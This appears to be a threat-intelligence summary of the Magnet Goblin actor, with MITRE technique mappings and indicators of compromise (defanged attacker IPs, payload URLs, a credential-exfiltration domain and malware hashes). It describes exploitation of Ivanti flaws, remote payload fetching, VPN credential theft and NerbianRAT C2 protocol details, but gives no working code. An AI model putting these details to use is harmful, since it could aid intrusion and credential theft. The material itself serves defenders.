Keypoints
- Magnet Goblin exploits 1-day vulnerabilities in public-facing services (e.g., Ivanti Connect Secure) for initial access.
- The actor deployed a new Linux variant of NerbianRAT and a smaller MiniNerbian backdoor in multiple campaigns.
- Payloads observed include a WARPWIRE JavaScript credential stealer, Ligolo tunneling tool, and RMM tools such as ScreenConnect and AnyDesk.
- Malicious payloads were hosted on attacker-controlled servers and downloaded via HTTP URLs (examples: 94.156.71[.]115, 91.92.240[.]113, 45.9.149[.]215).
- NerbianRAT uses AES (and sometimes RSA) encrypted custom C2 over raw TCP, enforces worktime windows, and supports a range of remote commands.
- MiniNerbian communicates via HTTP POST to /dashboard/ and supports a small set of config and command-execution actions.
- Compromised Magento servers were reused as C2/hosting infrastructure and to stage additional payloads via injected commands in web app data.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used as the initial access vector by rapidly weaponizing 1-day flaws in exposed services. (‘Magnet Goblin quickly adopts and leverages 1-day vulnerabilities in public-facing services as an initial infection vector.’)
- [T1105] Ingress Tool Transfer – Attackers download ELF and other payloads from attacker-controlled servers after exploitation. (‘download and deployment of an ELF file which turned out to be a Linux version of NerbianRAT’ / ‘The payloads were downloaded from the following URLs: http://94.156.71[.]115/lxrt …’)
- [T1056.003] Input Capture: Credentials from Web Browsers – A JavaScript stealer (WARPWIRE) exfiltrates VPN credentials via HTTP requests. (‘The stealer … sends VPN credentials to an external server over HTTP requests.’ / ‘https://www.miltonhouse[.]nl/pub/opt/processor.php’)
- [T1021] Remote Services – Use of legitimate RMM/remote access tools (ScreenConnect, AnyDesk) to administer compromised Windows hosts. (‘the threat actor’s Windows tools appear to include … ScreenConnect and AnyDesk’ / ‘ScreenConnect, which is downloaded from the attacker-controlled server at 94.156.71[.]115.’)
- [T1095] Non-Application Layer Protocol – The Linux NerbianRAT C2 uses raw TCP sockets with custom binary blobs for command-and-control. (‘Unlike the Windows variant, the Linux NerbianRAT utilizes raw TCP sockets, sending data blobs represented by structs back and forth in a custom protocol.’)
- [T1572] Protocol Tunneling – Use of tunneling tools (Ligolo) to pivot or tunnel traffic from compromised hosts. (‘Among the downloaded payloads are … Ligolo, an open-source tunneling tool written in GO.’)
Indicators of Compromise
- [IP] attacker infrastructure – 94.156.71[.]115, 91.92.240[.]113 (used to host/download payloads)
- [C2 IP] NerbianRAT command server – 172.86.66[.]165 (NerbianRAT C2), 45.153.240[.]73 (additional C2)
- [URL] download/endpoints – http://94.156.71[.]115/lxrt, http://91.92.240[.]113/aparche2 (payload download endpoints)
- [Domain] compromised/ C2 domains – www.fernandestechnical[.]com (compromised server used as C2), miltonhouse[.]nl (credential exfiltration endpoint)
- [SHA256] malware samples – 027d03679f7279a2c505f0677568972d30bc27daf43033a463fafeee0d7234f6 (NerbianRAT), d3fbae7eb3d38159913c7e9f4c627149df1882b57998c8acaac5904710be2236 (MiniNerbian)
Following exploitation of 1-day flaws in public-facing services (e.g., Ivanti Connect Secure and previously Magento/Qlik Sense), operators retrieved and executed payloads from attacker-controlled HTTP endpoints (examples: http://94.156.71[.]115/lxrt, http://91.92.240[.]113/aparche2). Observed payloads included a newly compiled Linux NerbianRAT ELF, MiniNerbian, a WARPWIRE JavaScript stealer that POSTs stolen VPN credentials to an external URL, the Ligolo tunneling tool for pivoting, and Windows RMM binaries such as ScreenConnect and AnyDesk. Compromised Magento instances were repurposed as hosting/C2 infrastructure and used to persistently stage download commands (for example, a curl command injected into web application data to fetch and run a binary).
Linux NerbianRAT initializes by collecting host details, building a bot ID (from /etc/machine-id and PID), and loading hardcoded hosts (e.g., 172.86.66.165). It enforces a working directory (/tmp/), reads an AES-encrypted configuration file (tmp/debconf.socket) using a hardcoded AES key and 16 null bytes IV, and can optionally use RSA for portions of communication. The backdoor communicates to C2 over raw TCP using a custom binary protocol; valid C2 messages begin with the magic ‘4r3f0’ and an AES-encrypted payload that, when decrypted, contains the ‘cmd’ marker. The implant supports numerous remote actions (execute commands synchronously/asynchronously, update timing windows, change intervals, update config fields, retrieve results), allowing operators to control activity windows and issue arbitrary shell commands.
MiniNerbian is a streamlined variant that uses HTTP POSTs to /dashboard/ for C2 and implements three primary actions: system_cmd (execute and return command output), time_flag_change (toggle always-on vs. scheduled operation), and core_config_set (update runtime configuration). WARPWIRE’s JS stealer captures VPN credentials from the client and exfiltrates them via HTTP to attacker-controlled endpoints. Operators also deployed tunneling (Ligolo) to forward traffic and RMM tools for interactive remote access, enabling both silent post-exploit automation and manual operator activity on compromised hosts.